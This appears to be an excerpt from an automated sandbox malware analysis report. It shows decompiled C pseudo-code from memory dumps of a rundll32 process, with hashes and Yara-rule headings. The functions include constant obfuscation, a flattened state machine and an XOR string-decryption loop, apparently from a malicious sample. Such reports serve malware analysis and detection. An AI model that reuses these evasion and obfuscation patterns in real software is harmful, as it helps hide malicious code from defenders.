C-Code - Quality: 94%

			E001FA83A(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v148;
				void* _t186;
				void* _t214;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr* _t250;
				signed int* _t251;
				void* _t252;
				void* _t253;

				_push(_a12);
				_t250 = _a8;
				_t251 = __ecx;
				_push(_t250);
				_push(_a4);
				_push(__ecx);
				E001F56B2(_t186);
				_v84 = _v84 & 0x00000000;
				_t253 = _t252 + 0x14;
				_v96 = 0x42e790;
				_v92 = 0x166b03;
				_t229 = 0x403bd71;
				_v88 = 0x3f33f0;
				_v8 = 0xe45a;
				_v8 = _v8 + 0x5419;
				_v8 = _v8 + 0xffff7773;
				_v8 = _v8 + 0xffff99fb;
				_v8 = _v8 ^ 0x000024f5;
				_v64 = 0xf2de;
				_v64 = _v64 >> 5;
				_v64 = _v64 ^ 0x00005589;
				_v56 = 0x66c2;
				_v56 = _v56 + 0xffff7624;
				_v56 = _v56 ^ 0xfffffb7f;
				_v80 = 0x220;
				_t222 = 0x62;
				_v80 = _v80 * 0x53;
				_v80 = _v80 ^ 0x0000e004;
				_v12 = 0x437a;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0x349b;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00026b25;
				_v76 = 0x38de;
				_v76 = _v76 ^ 0x7523cf62;
				_v76 = _v76 ^ 0x75239d7e;
				_v68 = 0x7c01;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x00006094;
				_v20 = 0xa4cb;
				_v20 = _v20 / _t222;
				_t223 = 0x21;
				_v20 = _v20 * 0xf;
				_v20 = _v20 / _t223;
				_v20 = _v20 ^ 0x00005a84;
				_v52 = 0x5274;
				_t224 = 0x27;
				_v52 = _v52 * 0x22;
				_v52 = _v52 ^ 0x000a8141;
				_v36 = 0x5a3a;
				_v36 = _v36 ^ 0x52f32f2b;
				_v36 = _v36 ^ 0xad8d6857;
				_v36 = _v36 ^ 0xff7e4623;
				_v60 = 0x640e;
				_v60 = _v60 * 0x1b;
				_v60 = _v60 ^ 0x000ab987;
				_v48 = 0xd288;
				_v48 = _v48 + 0x2c37;
				_v48 = _v48 / _t224;
				_v48 = _v48 ^ 0x00004291;
				_v28 = 0x54fc;
				_t225 = 0x60;
				_v28 = _v28 * 0x66;
				_v28 = _v28 << 0xd;
				_v28 = _v28 ^ 0x3b8d04ed;
				_v40 = 0x2878;
				_v40 = _v40 / _t225;
				_v40 = _v40 << 0xa;
				_v40 = _v40 ^ 0x0001c54a;
				_v32 = 0x68e5;
				_v32 = _v32 + 0xffffcd4c;
				_v32 = _v32 | 0x885dfaf7;
				_v32 = _v32 ^ 0x885dba23;
				_v44 = 0x878a;
				_v44 = _v44 | 0xeb76a9e1;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x0075e19b;
				_v72 = 0x39a;
				_t226 = 0x64;
				_v72 = _v72 / _t226;
				_v72 = _v72 ^ 0x00000009;
				_v16 = 0xa456;
				_v16 = _v16 + 0x7679;
				_v16 = _v16 | 0x2099d5c3;
				_v16 = _v16 * 0x46;
				_v16 = _v16 ^ 0xea13369a;
				_v24 = 0xa266;
				_v24 = _v24 >> 6;
				_v24 = _v24 | 0x0bc7efd3;
				_v24 = _v24 ^ 0x2d3320f9;
				_v24 = _v24 ^ 0x26f4c722;
				while(_t229 != 0x403bd71) {
					if(_t229 == 0xd2426f1) {
						E00208582(_v28, _t250 + 4, __eflags, _v40,  &_v148, _v32, _v44);
					} else {
						if(_t229 == 0x30c0e3fb) {
							_t231 = _t250;
							_t251[1] = E0020DD78(_t231);
							_push(_t231);
							_t214 = E001F607F(_t231, __eflags, _t231, _v24, _v16);
							_t253 = _t253 + 0x10;
							_t229 = 0x39b72fa5;
							_t251[1] = _t251[1] + _t214;
							continue;
						} else {
							if(_t229 == 0x36f770cf) {
								E0020F3E9(_v68, _v20, _v52, _t251,  &_v148);
								_t253 = _t253 + 0xc;
								_t229 = 0x388f3786;
								continue;
							} else {
								if(_t229 == 0x388f3786) {
									E001FCD04(_v36,  *_t250, _v60,  &_v148, _v48);
									_t253 = _t253 + 0xc;
									_t229 = 0xd2426f1;
									continue;
								} else {
									if(_t229 != 0x39b72fa5) {
										L13:
										__eflags = _t229 - 0x7f1da96;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_push(_t229);
										_t221 = E002057E8(_t251[1]);
										 *_t251 = _t221;
										if(_t221 != 0) {
											_t229 = 0x36f770cf;
											continue;
										}
									}
								}
							}
						}
					}
					__eflags =  *_t251;
					_t185 =  *_t251 != 0;
					__eflags = _t185;
					return 0 | _t185;
				}
				_t229 = 0x30c0e3fb;
				 *_t251 =  *_t251 & 0x00000000;
				__eflags =  *_t251;
				_t251[1] = _v72;
				goto L13;
			}

0x001fa846
0x001fa849
0x001fa84c
0x001fa84e
0x001fa84f
0x001fa853
0x001fa854
0x001fa859
0x001fa85d
0x001fa860
0x001fa869
0x001fa870
0x001fa875
0x001fa87c
0x001fa883
0x001fa88a
0x001fa891
0x001fa898
0x001fa89f
0x001fa8a6
0x001fa8aa
0x001fa8b1
0x001fa8b8
0x001fa8bf
0x001fa8c6
0x001fa8d3
0x001fa8d6
0x001fa8d9
0x001fa8e0
0x001fa8e7
0x001fa8eb
0x001fa8f2
0x001fa8f6
0x001fa8fd
0x001fa904
0x001fa90b
0x001fa912
0x001fa919
0x001fa91d
0x001fa924
0x001fa932
0x001fa939
0x001fa93c
0x001fa946
0x001fa949
0x001fa950
0x001fa95b
0x001fa95c
0x001fa95f
0x001fa966
0x001fa96d
0x001fa974
0x001fa97b
0x001fa982
0x001fa98d
0x001fa990
0x001fa997
0x001fa99e
0x001fa9aa
0x001fa9ad
0x001fa9b4
0x001fa9c3
0x001fa9c6
0x001fa9c9
0x001fa9cd
0x001fa9d4
0x001fa9e2
0x001fa9e5
0x001fa9e9
0x001fa9f0
0x001fa9f7
0x001fa9fe
0x001faa05
0x001faa0c
0x001faa13
0x001faa1a
0x001faa1e
0x001faa25
0x001faa2f
0x001faa37
0x001faa3a
0x001faa3e
0x001faa45
0x001faa4c
0x001faa57
0x001faa5a
0x001faa61
0x001faa68
0x001faa6c
0x001faa73
0x001faa7a
0x001faa81
0x001faa93
0x001fab80
0x001faa99
0x001faa9f
0x001fab1b
0x001fab22
0x001fab31
0x001fab39
0x001fab3e
0x001fab41
0x001fab46
0x00000000
0x001faaa1
0x001faaa3
0x001fab09
0x001fab0e
0x001fab11
0x00000000
0x001faaa5
0x001faaab
0x001faae9
0x001faaee
0x001faaf1
0x00000000
0x001faaad
0x001faab3
0x001fab5c
0x001fab5c
0x001fab62
0x00000000
0x00000000
0x001fab68
0x001faab9
0x001faabf
0x001faac3
0x001faac8
0x001faacd
0x001faad3
0x00000000
0x001faad3
0x001faacd
0x001faab3
0x001faaab
0x001faaa3
0x001faa9f
0x001fab8a
0x001fab8e
0x001fab8e
0x001fab95
0x001fab95
0x001fab51
0x001fab56
0x001fab56
0x001fab59
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 490a59cf89d529a46df9be0ebdbdf52a9a2cfee8a79e3243f32e0f1b5be57fa4
Instruction ID: 7bbf4e216d5275ffdb8065e4f6a3c3d9d518df1d01bd70fabfb6870ab079da9b
Opcode Fuzzy Hash: 490a59cf89d529a46df9be0ebdbdf52a9a2cfee8a79e3243f32e0f1b5be57fa4
Instruction Fuzzy Hash: 33A111B1D0020DEBDF18CFA5D98A5EEFBB2FF14318F208119E515AA2A0D3B95A45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0020D2CB, Relevance: .1, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0020D2CB(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t102;
				intOrPtr _t117;
				signed int _t120;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				intOrPtr _t132;
				intOrPtr _t145;
				char* _t148;

				_push(_a8);
				_t148 =  &E00211000;
				_push(_a4);
				_push(_t148);
				_push(__ecx);
				E001F56B2(_t102);
				_v8 = 0x5955;
				_t126 = 0x64;
				_v8 = _v8 / _t126;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x0003dad4;
				_v32 = 0x6516;
				_v32 = _v32 + 0xffff2696;
				_v32 = _v32 ^ 0xffff8a6f;
				_v12 = 0xe36b;
				_t127 = 0x33;
				_v12 = _v12 / _t127;
				_v12 = _v12 | 0x8ae53edf;
				_t128 = 0x55;
				_v12 = _v12 * 0x17;
				_v12 = _v12 ^ 0x7a98878f;
				_v24 = 0xe515;
				_v24 = _v24 * 0x63;
				_t129 = 0x24;
				_v24 = _v24 / _t128;
				_v24 = _v24 ^ 0x00017ed2;
				_v20 = 0x2395;
				_v20 = _v20 | 0xb3f3aeab;
				_v20 = _v20 + 0xaf88;
				_v20 = _v20 ^ 0xb3f45cc9;
				_v28 = 0x9af0;
				_v28 = _v28 * 0x39;
				_v28 = _v28 ^ 0xd7063ba5;
				_v28 = _v28 ^ 0xd7241e55;
				_v44 = 0x4d1f;
				_v44 = _v44 >> 2;
				_v44 = _v44 ^ 0x00005248;
				_v40 = 0x8238;
				_t130 = 0x44;
				_v40 = _v40 / _t129;
				_v40 = _v40 ^ 0x00002f18;
				_v36 = 0x2afb;
				_v36 = _v36 ^ 0xf2c87ef6;
				_v36 = _v36 ^ 0xf2c81ca8;
				_v16 = 0xbb48;
				_v16 = _v16 | 0x7786f7dc;
				_v16 = _v16 ^ 0x7786ffdc;
				_t117 = E002057E8(_t130);
				 *0x2121c0 = _t117;
				if(_t117 == 0) {
					L7:
					return 0;
				}
				 *((intOrPtr*)(_t117 + 4)) = _t148;
				 *((intOrPtr*)(_t117 + 0x18)) = _t148;
				_t132 =  *0x2121c0;
				_t145 =  *((intOrPtr*)(_t132 + 4));
				 *(_t132 + 0x40) = _v16;
				_t120 =  *(_t132 + 0x28);
				while( *((intOrPtr*)(_t145 + _t120 * 8)) != 0) {
					_t120 = _t120 + 1;
					 *(_t132 + 0x28) = _t120;
				}
				if(E0020E19F(_v24, _v20, _a8) == 0) {
					E001F91CD(_v28, _v44, _v40,  *0x2121c0, _v36);
					goto L7;
				}
				return 1;
			}

0x0020d2d2
0x0020d2d5
0x0020d2da
0x0020d2dd
0x0020d2de
0x0020d2df
0x0020d2e4
0x0020d2f2
0x0020d2f7
0x0020d2fc
0x0020d300
0x0020d304
0x0020d30b
0x0020d312
0x0020d319
0x0020d320
0x0020d32a
0x0020d32f
0x0020d334
0x0020d33f
0x0020d342
0x0020d345
0x0020d34c
0x0020d357
0x0020d35f
0x0020d360
0x0020d365
0x0020d36f
0x0020d376
0x0020d37d
0x0020d384
0x0020d38b
0x0020d398
0x0020d39b
0x0020d3a2
0x0020d3a9
0x0020d3b0
0x0020d3b4
0x0020d3bb
0x0020d3c7
0x0020d3c8
0x0020d3cb
0x0020d3d2
0x0020d3d9
0x0020d3e0
0x0020d3e7
0x0020d3ee
0x0020d3f5
0x0020d402
0x0020d407
0x0020d40f
0x0020d46b
0x00000000
0x0020d46b
0x0020d411
0x0020d414
0x0020d41a
0x0020d420
0x0020d423
0x0020d426
0x0020d42f
0x0020d42b
0x0020d42c
0x0020d42c
0x0020d44a
0x0020d463
0x00000000
0x0020d468
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c5b418bbe30cf64108563a32fe30dd7bde66f9eb099efe7f4282ec4756612e
Instruction ID: 7bd189130733cf2037cea2d5a1c3d22c9c977d582cac8db483fae3689578e44e
Opcode Fuzzy Hash: d0c5b418bbe30cf64108563a32fe30dd7bde66f9eb099efe7f4282ec4756612e
Instruction Fuzzy Hash: 0F514271E0030AEFDB08CFA4D94A5EEBBF1FB09314F208099D505BA291D7B59A55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002AC83F, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a9b1a4b616713f19cea69ea080f44497bf249a7e014293bc2d0aff668e376b
Instruction ID: 00636e60d2f3b91bbc3828b7223bd31114fb29115d1aa295378a33339669031e
Opcode Fuzzy Hash: e3a9b1a4b616713f19cea69ea080f44497bf249a7e014293bc2d0aff668e376b
Instruction Fuzzy Hash: 1E512671D0430AEFDB08DFA4C98A5EEBFB1FB09314F20805AD505BA290DBB59A51CF95

Uniqueness

Uniqueness Score: -1.00%

Function 002073C0, Relevance: .1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E002073C0(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t149;
				signed int _t150;
				void* _t153;

				_t153 = __eflags;
				_v24 = 0x158c;
				_v24 = _v24 | 0xc19b8b86;
				_v24 = _v24 + 0xffffcdb5;
				_v24 = _v24 ^ 0xc19b1e12;
				_v8 = 0x1996;
				_v8 = _v8 + 0xffffce0e;
				_t149 = __ecx;
				_v8 = _v8 * 0x33;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0xffeca024;
				_v40 = 0x2715;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000a273;
				_v12 = 0x2149;
				_v12 = _v12 << 1;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x1e3791f4;
				_v12 = _v12 ^ 0x1e37d0cb;
				_v28 = 0xe2f1;
				_v28 = _v28 << 3;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x001c0c8b;
				_v36 = 0x4110;
				_v36 = _v36 + 0xffff4283;
				_v36 = _v36 ^ 0xffffc6f6;
				_v20 = 0x5435;
				_v20 = _v20 >> 4;
				_v20 = _v20 << 7;
				_t138 = 0xe;
				_v20 = _v20 / _t138;
				_v20 = _v20 ^ 0x00005afa;
				_v16 = 0x4238;
				_v16 = _v16 + 0xe21;
				_v16 = _v16 ^ 0xb01b9cfe;
				_v16 = _v16 ^ 0x6bc8f8c5;
				_v16 = _v16 ^ 0xdbd331c2;
				_v32 = 0x5416;
				_t139 = 0x7b;
				_v32 = _v32 * 0x2f;
				_v32 = _v32 >> 0x10;
				_v32 = _v32 ^ 0x000053bd;
				_v44 = 0x8a9a;
				_v44 = _v44 / _t139;
				_v44 = _v44 ^ 0x00006f27;
				_v48 = E00207B6B();
				_v8 = 0x4004;
				_v8 = _v8 + 0xffff74e9;
				_v8 = _v8 | 0xacc11b51;
				_t140 = 0x54;
				_push(_t140);
				_v8 = _v8 / _t140;
				_v8 = _v8 ^ 0x030c2ffb;
				_v24 = 0x843c;
				_v24 = _v24 | 0xd1d25750;
				_v24 = _v24 * 0x7a;
				_v24 = _v24 ^ 0xfe7ab108;
				_t150 = E001F607F(_t140, _t153, _t140, _v24, _v8);
				E001FD940(_t149, _v16, _v32, _v44, 3,  &_v48, _t150);
				 *((short*)(_t149 + _t150 * 2)) = 0;
				return 0;
			}

0x002073c0
0x002073c6
0x002073cf
0x002073d6
0x002073dd
0x002073e4
0x002073eb
0x002073fa
0x002073fc
0x002073ff
0x00207403
0x0020740a
0x00207411
0x00207415
0x0020741c
0x00207423
0x00207426
0x0020742a
0x00207431
0x00207438
0x0020743f
0x00207443
0x00207447
0x0020744e
0x00207455
0x0020745c
0x00207463
0x0020746a
0x0020746e
0x00207475
0x0020747a
0x0020747f
0x00207486
0x0020748d
0x00207494
0x0020749b
0x002074a2
0x002074a9
0x002074b4
0x002074b5
0x002074b8
0x002074bc
0x002074c3
0x002074cf
0x002074d2
0x002074e4
0x002074e9
0x002074f0
0x002074f7
0x00207503
0x00207506
0x00207507
0x0020750a
0x00207511
0x00207518
0x00207523
0x00207526
0x00207545
0x0020755c
0x00207566
0x0020756f

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
Instruction ID: e4230b4bef3b626adb12998af41b0feb0b16de0d712cfd4a79411bd52249f163
Opcode Fuzzy Hash: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
Instruction Fuzzy Hash: E251D2B1D0120AEBDB48CFA5DA4A4EEBBB1FB48314F208159D112B72A0D3B95B45DF94

Uniqueness

Uniqueness Score: -1.00%

Function 002A6934, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
Instruction ID: 5cb5f48e3450463f547cc05d64f8fccf5bfb2a3a48e571557a95765021e06a0e
Opcode Fuzzy Hash: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
Instruction Fuzzy Hash: 1D51E2B1D0120AEBDF08CFA5DA4A9DEBBB1FB48304F208159D112B72A0D3B55B45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0020BF25, Relevance: .1, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0020BF25(void* __ecx, void* __edx, void* __eflags) {
				void* _t49;
				signed int _t56;
				short* _t72;
				signed int _t73;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				short* _t93;
				signed int* _t94;
				signed int* _t95;
				signed int* _t96;
				unsigned int _t98;
				void* _t104;
				short _t106;
				void* _t108;
				void* _t109;

				_t96 =  *(_t108 + 0x1c);
				_push(_t96);
				_push( *(_t108 + 0x20));
				_push(__ecx);
				E001F56B2(_t49);
				 *(_t108 + 0x1c) = 0x8b96;
				_t94 =  &(_t96[1]);
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffff20a0;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffff41f6;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) << 0xc;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xeee2dc93;
				 *(_t108 + 0x30) = 0x710f;
				 *(_t108 + 0x30) =  *(_t108 + 0x30) | 0x6ece5f34;
				_t75 = 0x49;
				 *(_t108 + 0x34) =  *(_t108 + 0x30) / _t75;
				_t76 = 0x78;
				 *(_t108 + 0x30) =  *(_t108 + 0x34) / _t76;
				 *(_t108 + 0x30) =  *(_t108 + 0x30) ^ 0x00037f97;
				_t77 =  *_t96;
				_t95 =  &(_t94[1]);
				_t56 =  *_t94 ^ _t77;
				 *(_t108 + 0x20) = _t77;
				 *(_t108 + 0x24) = _t56;
				_t98 =  !=  ? (_t56 + 0x00000001 & 0xfffffffc) + 4 : _t56 + 1;
				_t109 = _t108 + 0xc;
				_t72 = E002057E8(_t98 + _t98);
				 *((intOrPtr*)(_t109 + 0x24)) = _t72;
				if(_t72 != 0) {
					_t106 = 0;
					_t93 = _t72;
					_t104 =  >  ? 0 :  &(_t95[_t98 >> 2]) - _t95 + 3 >> 2;
					if(_t104 != 0) {
						_t73 =  *(_t109 + 0x14);
						do {
							_t84 =  *_t95;
							_t95 =  &(_t95[1]);
							_t85 = _t84 ^ _t73;
							 *_t93 = _t85 & 0x000000ff;
							_t93 = _t93 + 8;
							 *((short*)(_t93 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t106 = _t106 + 1;
							 *((short*)(_t93 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t93 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t106 < _t104);
						_t72 =  *((intOrPtr*)(_t109 + 0x24));
					}
					 *((short*)(_t72 +  *(_t109 + 0x18) * 2)) = 0;
				}
				return _t72;
			}

0x0020bf2a
0x0020bf2f
0x0020bf30
0x0020bf35
0x0020bf36
0x0020bf3b
0x0020bf43
0x0020bf46
0x0020bf50
0x0020bf58
0x0020bf5d
0x0020bf65
0x0020bf6d
0x0020bf7b
0x0020bf80
0x0020bf8a
0x0020bf8d
0x0020bf91
0x0020bf99
0x0020bf9d
0x0020bfa0
0x0020bfa2
0x0020bfa6
0x0020bfba
0x0020bfc5
0x0020bfd0
0x0020bfd2
0x0020bfd9
0x0020bfe1
0x0020bfe3
0x0020bff4
0x0020bff9
0x0020bffb
0x0020bfff
0x0020bfff
0x0020c001
0x0020c004
0x0020c009
0x0020c011
0x0020c017
0x0020c01b
0x0020c024
0x0020c025
0x0020c02c
0x0020c030
0x0020c034
0x0020c034
0x0020c03f
0x0020c03f
0x0020c04b

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e2487da670dfdf4340291a23b1239054837bb09989d1aae364528b122fc451e
Instruction ID: e40179872e2be1bfadcffacac3a483afb5052ced3ef17c5839d03cbc4201526d
Opcode Fuzzy Hash: 7e2487da670dfdf4340291a23b1239054837bb09989d1aae364528b122fc451e
Instruction Fuzzy Hash: 80319C72A183129FC314CF29C88596BF3E1FF88710F414A2EF98597280DB74E909CB82

Uniqueness

Uniqueness Score: -1.00%

Function 002AB499, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c293da06f71a5465484c9d54c90b6d294190198ebdecfe10976e23846b6f163
Instruction ID: e6f36e0dd0de9e0e1e006ef7f4d8df73b4af9a4dec06f0a4e820b9f9dc607d89
Opcode Fuzzy Hash: 7c293da06f71a5465484c9d54c90b6d294190198ebdecfe10976e23846b6f163
Instruction Fuzzy Hash: 6831AD72A183119FC314DF29C88596AF3E0FFC8710F414A2EF98997240DB74E919CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001F903F, Relevance: .1, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001F903F(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _t136;
				signed int _t137;
				signed int _t138;

				_v56 = _v56 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v60 = 0x4b89aa;
				_v24 = 0xd383;
				_v24 = _v24 >> 1;
				_v24 = _v24 + 0xffff6796;
				_v24 = _v24 ^ 0xffff9ecb;
				_v40 = 0x275e;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 ^ 0x00004c05;
				_v36 = 0x2d7f;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x00b5d622;
				_v12 = 0x609d;
				_v12 = _v12 * 0x39;
				_t136 = 0x71;
				_v12 = _v12 * 0x6d;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x24a35bb0;
				_v8 = 0x6158;
				_v8 = _v8 ^ 0x69c6b5b2;
				_v8 = _v8 / _t136;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0xbe8af890;
				_v44 = 0xc5d5;
				_v44 = _v44 | 0xbfd7fc3e;
				_v44 = _v44 ^ 0xbfd7cdf6;
				_v28 = 0x68fd;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 + 0xaf9b;
				_v28 = _v28 ^ 0x0000e0c3;
				_v32 = 0xe5f5;
				_v32 = _v32 ^ 0x15b965a8;
				_v32 = _v32 | 0x20bfb64a;
				_v32 = _v32 ^ 0x35bfa224;
				_v20 = 0x2af5;
				_t137 = 0x36;
				_v20 = _v20 / _t137;
				_v20 = _v20 + 0xffff0be2;
				_v20 = _v20 ^ 0xaeef640c;
				_v20 = _v20 ^ 0x5110195f;
				_v48 = 0xf5d2;
				_t138 = 0x45;
				_push(__ecx);
				_v48 = _v48 / _t138;
				_v48 = _v48 ^ 0x00004994;
				_v16 = 0x4a26;
				_v16 = _v16 + 0xffffa2aa;
				_v16 = _v16 >> 7;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0xffff886f;
				_push(_v36);
				 *((intOrPtr*)( *0x2121b8 + 0x2c + __edx * 4)) = E001F3708(_v12, _v8, _v44, E0020BF25(_v24, _v40, _v16), _v28);
				return E0020C5F7(_v32, _v20, _v48, _v16, _t117);
			}

0x001f9045
0x001f9049
0x001f904d
0x001f9054
0x001f905b
0x001f905e
0x001f9065
0x001f906c
0x001f9073
0x001f9077
0x001f907e
0x001f9085
0x001f9089
0x001f9090
0x001f90a3
0x001f90aa
0x001f90ad
0x001f90b0
0x001f90b4
0x001f90bb
0x001f90c2
0x001f90d0
0x001f90d3
0x001f90d7
0x001f90de
0x001f90e5
0x001f90ec
0x001f90f3
0x001f90fa
0x001f90fe
0x001f9105
0x001f910c
0x001f9113
0x001f911a
0x001f9121
0x001f9128
0x001f9132
0x001f9137
0x001f913c
0x001f9143
0x001f914a
0x001f9151
0x001f915b
0x001f915e
0x001f915f
0x001f9162
0x001f9169
0x001f9170
0x001f9177
0x001f917b
0x001f917f
0x001f9186
0x001f91ae
0x001f91cc

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a01fb7e6a70be18e916e07e1093ce914b3850b06671c8aa0f8f7c0574e1dc0b
Instruction ID: 73e1e8e2110e49a101947b5aa64e3ce5c6ed148673f78b29ca97c7074b370dbb
Opcode Fuzzy Hash: 0a01fb7e6a70be18e916e07e1093ce914b3850b06671c8aa0f8f7c0574e1dc0b
Instruction Fuzzy Hash: E041FFB1D0021DEBDB58CFA5D98A5EEFFB1FB48314F208198D511B6290D7B90A46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002985B3, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51dcfb4cfcea488844358ec72e91382d8bd013999b624d1d3520df14b43e93ae
Instruction ID: 1ca859248b707ad783dae7402e49a19c02756f9bbac14b986f157415e348df66
Opcode Fuzzy Hash: 51dcfb4cfcea488844358ec72e91382d8bd013999b624d1d3520df14b43e93ae
